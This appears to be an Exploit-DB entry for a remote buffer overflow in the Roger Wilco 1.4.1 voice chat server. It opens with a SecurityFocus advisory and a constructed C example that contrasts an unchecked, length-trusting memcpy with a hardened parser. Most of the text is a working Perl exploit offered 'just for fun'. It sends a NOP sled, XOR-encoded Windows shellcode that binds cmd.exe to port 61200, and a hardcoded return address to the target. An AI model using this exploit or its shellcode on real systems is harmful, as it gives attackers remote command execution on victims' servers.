Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun

EDB-ID:

23123

CVE:



Author:

D4rkGr3y

Type:

remote


Platform:

Windows

Date:

2003-09-08


source: https://www.securityfocus.com/bid/8566/info

A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side and can be triggered when processing malformed client packets. Specifically, when connecting to a server the Roger Wilco client transmits a packet containing the size of the data to be copied into an internal buffer. As a result, a malicious user could supply an oversized value so that more data is copied into the previously allocated buffer than it can hold. This could ultimately allow sensitive server memory to be corrupted, potentially resulting in the execution of arbitrary code.
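The length-trusting copy the advisory describes, as an added example that is not Roger Wilco's code (the real wire format and buffer sizes are not documented on this page): a constructed, hypothetical packet layout with a client-declared payload length, a parser that trusts that length, and a hardened parser that validates it against both the destination buffer and the bytes actually received. The packet layout, `CHANNEL_BUF_SIZE`, and every function name here are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed, hypothetical layout used only for this example:
 *   bytes 0-1 : big-endian u16, client-declared payload length N
 *   bytes 2.. : N payload bytes
 * It is not the Roger Wilco protocol. */
#define CHANNEL_BUF_SIZE 64

struct session {
    char channel[CHANNEL_BUF_SIZE];
    size_t channel_len;
};

/* Vulnerable pattern: the declared length drives the copy and nothing
 * compares it with the destination size or the bytes really present.
 * Shown for contrast only; it is never called in this example. */
int parse_channel_unchecked(struct session *s, const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < 2) return -1;
    size_t declared = ((size_t)pkt[0] << 8) | pkt[1];
    memcpy(s->channel, pkt + 2, declared);   /* overflows when declared > CHANNEL_BUF_SIZE */
    s->channel_len = declared;
    return 0;
}

/* Hardened pattern: reject a declared length that exceeds the destination
 * (leaving room for a terminator) or exceeds what was actually received. */
int parse_channel_checked(struct session *s, const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < 2) return -1;                  /* no header */
    size_t declared = ((size_t)pkt[0] << 8) | pkt[1];
    if (declared >= CHANNEL_BUF_SIZE) return -2; /* would overflow the buffer */
    if (declared > pkt_len - 2) return -3;       /* claims more than was sent */
    memcpy(s->channel, pkt + 2, declared);
    s->channel[declared] = '\0';
    s->channel_len = declared;
    return 0;
}

/* Builds a constructed test packet whose header may deliberately disagree
 * with the payload it carries, so the parser's checks can be exercised. */
size_t build_packet(uint8_t *out, size_t out_cap, uint16_t declared,
                    const uint8_t *payload, size_t payload_len) {
    if (out_cap < 2 || payload_len > out_cap - 2) return 0;
    out[0] = (uint8_t)(declared >> 8);
    out[1] = (uint8_t)(declared & 0xFF);
    memcpy(out + 2, payload, payload_len);
    return 2 + payload_len;
}

/* Runs the hardened parser on a packet that declares `declared` bytes but
 * carries `actual_len` bytes of filler; returns the parser's result code. */
int check_constructed_packet(uint16_t declared, size_t actual_len) {
    uint8_t filler[CHANNEL_BUF_SIZE];
    memset(filler, 'A', sizeof filler);
    if (actual_len > sizeof filler) actual_len = sizeof filler;
    uint8_t pkt[2 + CHANNEL_BUF_SIZE];
    size_t n = build_packet(pkt, sizeof pkt, declared, filler, actual_len);
    struct session s;
    return parse_channel_checked(&s, pkt, n);
}

/* Parses a well-formed constructed packet carrying "channel" and returns
 * the stored name, so callers can confirm the good path still works. */
const char *demo_channel_name(void) {
    static struct session s;
    const char name[] = "channel";
    uint8_t pkt[2 + CHANNEL_BUF_SIZE];
    size_t n = build_packet(pkt, sizeof pkt, (uint16_t)(sizeof name - 1),
                            (const uint8_t *)name, sizeof name - 1);
    if (parse_channel_checked(&s, pkt, n) != 0) return "";
    return s.channel;
}

int main(void) {
    printf("valid packet        -> %d (%s)\n", check_constructed_packet(7, 7), demo_channel_name());
    printf("oversized length    -> %d\n", check_constructed_packet(0xFFFF, 7));
    printf("truncated payload   -> %d\n", check_constructed_packet(10, 3));
    return 0;
}
```

The two parsers differ only in the checks before `memcpy`; the hardened one treats the client-declared length as untrusted input and bounds it by what the server allocated and by what it actually read from the socket, which is the fix class for the bug described above.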

#!/usr/bin/perl
#
#       RogerWilco v1.4.1.6 remote buffer overflow exploit
#  ...just for fun
#
# Binds cmd.exe shell on port 61200.
# Retaddr 0x0122fa44 will work only if roger.exe has md5
# checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6).
# And there is no matter which win32 operating system is installed
# (winxp/2k/nt/me/9x/03).
# Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm).
# Vendor: rogerwilco.gamespy.com.
# Bug found by Auriemma Luigi (hey dude in da third time ;])
# Advisory: security.nnov.ru/search/document.asp?docid=5074
#
# Greets to all ppl from #m00sec #nerf and #priv8security (EFnet)
#
# d4rkgr3y [d4rk@securitylab.ru] // m00 [www.m00.ru]
#

use IO::Socket;
$host = "127.0.0.1";
$port = "3782";
$retaddr = "\x44\xfa\x22\x01";

$shellcode =
	"\x33\xff". #xor edi,edi
	"\x33\xf6". #xor esi,esi
	"\x33\xdb". #xor ebx,ebx
	"\xB8\x01\xF0\x22\x01". #mov eax,122F020
	#"\xcc". #int3
	"\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA". #decryptor
	#winxp/2k xored portbind shellcode
	"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7".
	"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0".
	"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E".
	"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0".
	"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A".
	"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96".
	"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0".
	"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92".
	"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50".
	"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97".
	"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1".
	"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2".
	"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0".
	"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2".
	"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2".
	"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A".
	"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37".
	"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F".
	"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1".
	"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95".
	"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57".
	"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A".
	"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB".
	"\xCD\x54\x92\x96";


for($i=0;$i<1263-200-490;$i++) {
	$execode .= "\x90";
}

$execode .= "$shellcode";

for($i=0;$i<200;$i++) {
	$execode .= "\x90";
}
print "\n\rRogerWilco v1.4.1.6 remote buffer overflow exploit\n\n=> Connecting to $host:$port.. ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die " damn\n";
print "ok\n=> Sending exploit buffer... ";
$buf =
	"\x0F\x00\x05\x08\x6A\xD6\x4C\x03".
	"\x96\xED\x3B\xE7\x88\xE2\xA9\x74".
	"channel".
	"\x00".
	"$execode".
	"$retaddr".
	"\x0F\x10\x00\x04".
	"d4rk".
	"\x0F\x11\x00\x04\x00\x00\x00\x02".
	"\x0F\x12\x00\x04\x00\x00\x00\x00";

print $socket "$buf";
print "ok\n=> Exiting... \n\n";
sleep(2);

close($socket);